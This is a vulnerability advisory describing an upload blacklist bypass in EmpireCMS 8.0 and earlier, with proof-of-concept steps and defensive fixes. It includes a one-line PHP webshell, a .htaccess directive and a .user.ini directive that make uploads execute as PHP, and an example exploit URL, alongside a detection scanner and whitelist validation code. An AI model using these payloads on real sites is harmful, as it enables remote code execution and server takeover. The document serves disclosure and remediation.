EmpireCMS 8.0 Unrestricted Upload

Title: File Upload Blacklist Bypass Vulnerability in EmpireCMS ≤ 8.0

BUG_Author: pemic, gets

Affected Version: EmpireCMS ≤ 8.0

Vendor: EmpireCMS Official

Software: EmpireCMS Download

Vulnerability File:

  • e/class/connect.php

Description:

A file upload restriction bypass exists in EmpireCMS because CheckSaveTranFiletype() in e/class/connect.php validates uploads against an incomplete blacklist of extensions. The list does not include .htaccess or .user.ini, so a member-level user can upload a server configuration file into the upload directory and then make a second, innocuous-looking upload (for example shell.jpg) execute as PHP. Under Apache with mod_php this is done through .htaccess; under Nginx with PHP-FPM (or any CGI/FastCGI PHP) through .user.ini. The result is remote code execution (RCE) as the web server user.

Vulnerability Analysis:

Root Cause:

In file e/class/connect.php, lines 6554-6561, the CheckSaveTranFiletype() function implements a blacklist-based file type validation:

function CheckSaveTranFiletype($filetype){
    $savetranfiletype=',.php,.php3,.php4,.php5,.php6,.php7,.php8,.php9,.phar,.asp,.aspx,.jsp,.cgi,.phtml,.asa,.asax,.fcgi,.pl,.ascx,.ashx,.cer,.cdx,.pht,.shtml,.shtm,.stm,';
    if(stristr($savetranfiletype,','.$filetype.','))
    {
        return true;
    }
    return false;
}

Missing dangerous file types:

  • .htaccess - per-directory Apache configuration; when AllowOverride permits it (FileInfo or All) and PHP runs as mod_php, an AddType directive maps an arbitrary extension such as .jpg to the PHP handler

  • .user.ini - per-directory PHP INI file, read when PHP runs as CGI/FastCGI (the usual Nginx + PHP-FPM setup); its auto_prepend_file directive makes PHP include an attacker-controlled file before every script in that directory

  • .php. - Windows removes trailing dots when creating a file, so a name that reaches the check as ".php." is stored on disk as ".php"

  • .php::$DATA - NTFS alternate data stream syntax; Windows stores shell.php::$DATA as shell.php, while the check sees an extension that is not on the list

Attack Vector:

An attacker with member privileges can:

  1. Upload a .htaccess file to enable PHP execution for a custom extension (e.g., .jpg)

  2. Upload a webshell with that extension (e.g., shell.jpg)

  3. Access the webshell to execute arbitrary code

Proof of Concept:

Test Environment:

  • EmpireCMS Version: 8.0

  • PHP Version: 5.6

  • Apache Version: 2.4.25

  • Apache AllowOverride: All

Step 1: Verify blacklist bypass

Execute the following test to confirm which file types bypass the blacklist:

<?php
// Load the vulnerable function directly, bypassing the web front end.
// InEmpireCMS is the guard constant EmpireCMS source files expect.
define('InEmpireCMS', TRUE);
include('/path/to/e/class/connect.php');

// CheckSaveTranFiletype() returns true when the extension is on the
// blacklist (upload refused) and false otherwise (upload accepted).
$test_types = array('.php', '.htaccess', '.user.ini', '.php.');
foreach($test_types as $type) {
    $result = CheckSaveTranFiletype($type);
    echo $type . ': ' . ($result ? 'BLOCKED' : 'BYPASSED') . "\n";
}
?>

Result:

.php: BLOCKED
.htaccess: BYPASSED
.user.ini: BYPASSED
.php.: BYPASSED

Step 2: Exploitation scenario (Apache)

  1. Register a member account on the target website

  2. Create a malicious .htaccess file:

AddType application/x-httpd-php .jpg

     This directive takes effect when PHP runs as an Apache module and the upload directory is covered by AllowOverride FileInfo (or All, as in the test environment). With PHP-FPM behind Apache the equivalent is a SetHandler directive pointing at the FPM proxy.

  3. Upload the .htaccess file through the member file upload function

  4. Create a webshell named shell.jpg:

<?php system($_GET['cmd']); ?>

  5. Upload shell.jpg to the same directory

  6. Access the webshell:

http://target/d/file/2024/12-22/shell.jpg?cmd=whoami

Step 3: Exploitation scenario (Nginx with PHP-FPM)

  1. Create a malicious .user.ini file:

auto_prepend_file=/tmp/shell.txt

  2. Upload the .user.ini file

  3. Place PHP code in /tmp/shell.txt or use other means to create it; any file the PHP-FPM worker can read will do, so the path can equally point at another upload

  4. Any PHP script in that directory (or below it) now runs the prepended code first. Two conditions apply: .user.ini is honored only by the CGI/FastCGI SAPIs, not by mod_php, and PHP caches the file for user_ini.cache_ttl seconds (300 by default), so the change can take up to five minutes to become effective. If the upload directory contains no PHP script, there is nothing for the prepend to attach to.
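To check an existing installation for the traces these two scenarios leave behind, the following added example (not EmpireCMS code) walks an upload tree and reports server configuration files, other dotfiles, and files that carry a PHP open tag. The function name FindUploadAbuse and the default directory are assumptions; d/file is taken from the PoC URL above, so pass the path your installation actually uses.

```php
<?php
// Added example, not EmpireCMS code: scan an upload directory for the
// artifacts of the .htaccess / .user.ini upload attack. Function name and
// the default path are assumptions for this illustration.

function FindUploadAbuse($dir)
{
    $findings = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $name = $file->getFilename();

        // Server/PHP configuration files have no business in an upload tree.
        if (strcasecmp($name, '.htaccess') === 0 || strcasecmp($name, '.user.ini') === 0) {
            $findings[] = array($path, 'server configuration file in upload directory');
            continue;
        }
        // Any other dotfile is suspicious as well (.htpasswd, .user.ini variants).
        if ($name[0] === '.') {
            $findings[] = array($path, 'hidden file in upload directory');
            continue;
        }
        // Look for PHP open tags in what should be plain data (images,
        // documents). Only the first 64 KiB is read: webshells are small and
        // a prepended payload sits at the start of the file.
        $head = file_get_contents($path, false, null, 0, 65536);
        if ($head !== false && preg_match('/<\?(php|=)/i', $head)) {
            $findings[] = array($path, 'PHP open tag in uploaded file');
        }
    }
    return $findings;
}

// Usage: php find_upload_abuse.php /var/www/html/d/file
$dir = isset($argv[1]) ? $argv[1] : 'd/file';
foreach (FindUploadAbuse($dir) as $f) {
    printf("%s: %s\n", $f[1], $f[0]);
}
```

Run it as a CLI script from the web root. Anything it reports should be treated as an indicator of compromise and correlated with the web server access log for requests to the same path carrying a query string such as ?cmd=.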

Impact:

An attacker with member-level access can:

  • Execute arbitrary system commands on the server

  • Read/write any files accessible to the web server user

  • Compromise the entire server

  • Access database credentials and sensitive data

Tested Bypass Extensions:

  Extension      Status     Attack Vector
  .htaccess      BYPASSED   Apache AddType directive
  .user.ini      BYPASSED   PHP auto_prepend_file
  .php.          BYPASSED   Windows trailing dot
  .php::$DATA    BYPASSED   Windows NTFS ADS

Suggested Fix:

Replace blacklist validation with whitelist validation:

function CheckSaveTranFiletype($filetype){
    // Whitelist of allowed extensions; everything not listed is rejected.
    // The original return convention is kept (true = blocked) so callers
    // need no change.
    $allowedTypes = array('.jpg', '.jpeg', '.png', '.gif', '.bmp', '.pdf', '.doc', '.docx', '.xls', '.xlsx', '.txt', '.zip', '.rar');

    $filetype = strtolower($filetype);
    if(in_array($filetype, $allowedTypes, true)){
        return false; // Allowed
    }
    return true; // Blocked
}

Alternatively, as a minimum fix, add the two configuration file names to the current blacklist:

$savetranfiletype=',.php,.php3,.php4,.php5,.php6,.php7,.php8,.php9,.phar,.asp,.aspx,.jsp,.cgi,.phtml,.asa,.asax,.fcgi,.pl,.ascx,.ashx,.cer,.cdx,.pht,.shtml,.shtm,.stm,.htaccess,.user.ini,';

This is only a stopgap. It still does not reject the trailing-dot and ::$DATA variants, and it only helps if the caller passes the complete ".user.ini" suffix rather than the text after the last dot (".ini"). Independently of the PHP-side check, the upload directory should be served with AllowOverride None (Apache) and with PHP execution disabled, so that an uploaded .htaccess or webshell is inert even if another bypass is found.
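A blacklist that matches only the extension string handed to it cannot cover the Windows variants or the double-suffix case. As an added example (not EmpireCMS code; the function name IsSafeUploadName and the allowed-extension list are assumptions), the following validates the whole filename the way a replacement for CheckSaveTranFiletype() should: it normalises the trailing-dot and ::$DATA forms first, refuses dotfiles such as .htaccess and .user.ini, and accepts only single-extension names from a whitelist. Run against the names from the Tested Bypass Extensions table plus a double extension, only shell.jpg and SHELL.JPG are accepted.

```php
<?php
// Added example, not EmpireCMS code: whitelist validation of the complete
// saved filename. Function name and allowed list are assumptions.

function IsSafeUploadName($filename)
{
    // Extensions the upload feature is meant to accept (assumed policy).
    static $allowed = array('jpg', 'jpeg', 'png', 'gif', 'bmp', 'pdf', 'txt', 'zip');

    // Keep only the final path component; a client-supplied "a/../x.php"
    // must never influence where the file lands.
    $name = basename(str_replace('\\', '/', $filename));

    // Normalise the two Windows tricks before inspecting anything: NTFS
    // drops the "::$DATA" stream suffix and trailing dots/spaces when the
    // file is created, so "shell.php::$DATA" and "shell.php." both end up
    // as "shell.php" on disk. Validate what will actually be written.
    $name = preg_replace('/::\$DATA$/i', '', $name);
    $name = rtrim($name, ". ");

    // Reject empty names and control characters (NUL truncation and friends).
    if ($name === '' || preg_match('/[\x00-\x1f\x7f]/', $name)) {
        return false;
    }

    // Dotfiles such as .htaccess and .user.ini are exactly the files that
    // reconfigure the server: refuse anything starting with a dot.
    if ($name[0] === '.') {
        return false;
    }

    // Require exactly one dot so "shell.php.jpg" and "x.user.ini" cannot
    // slip past a last-dot extension extraction.
    $parts = explode('.', $name);
    if (count($parts) !== 2) {
        return false;
    }
    list($base, $ext) = $parts;
    if ($base === '' || !in_array(strtolower($ext), $allowed, true)) {
        return false;
    }
    return true;
}

// Constructed sample names: the advisory's bypass cases plus two controls.
$samples = array('shell.jpg', 'SHELL.JPG', 'shell.php', 'shell.php.',
                 'shell.php::$DATA', '.htaccess', '.user.ini', 'shell.php.jpg');
foreach ($samples as $s) {
    printf("%-18s %s\n", $s, IsSafeUploadName($s) ? 'ALLOWED' : 'REJECTED');
}
```

The check validates the name that will be written, not the name the client sent, which is what defeats the trailing-dot and ::$DATA variants. It is still a filename check only; content sniffing and serving the upload directory without PHP execution remain necessary layers.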

Timeline:

  • 2025-12-22: Vulnerability discovered and verified

  • 2025-12-22: Report submitted
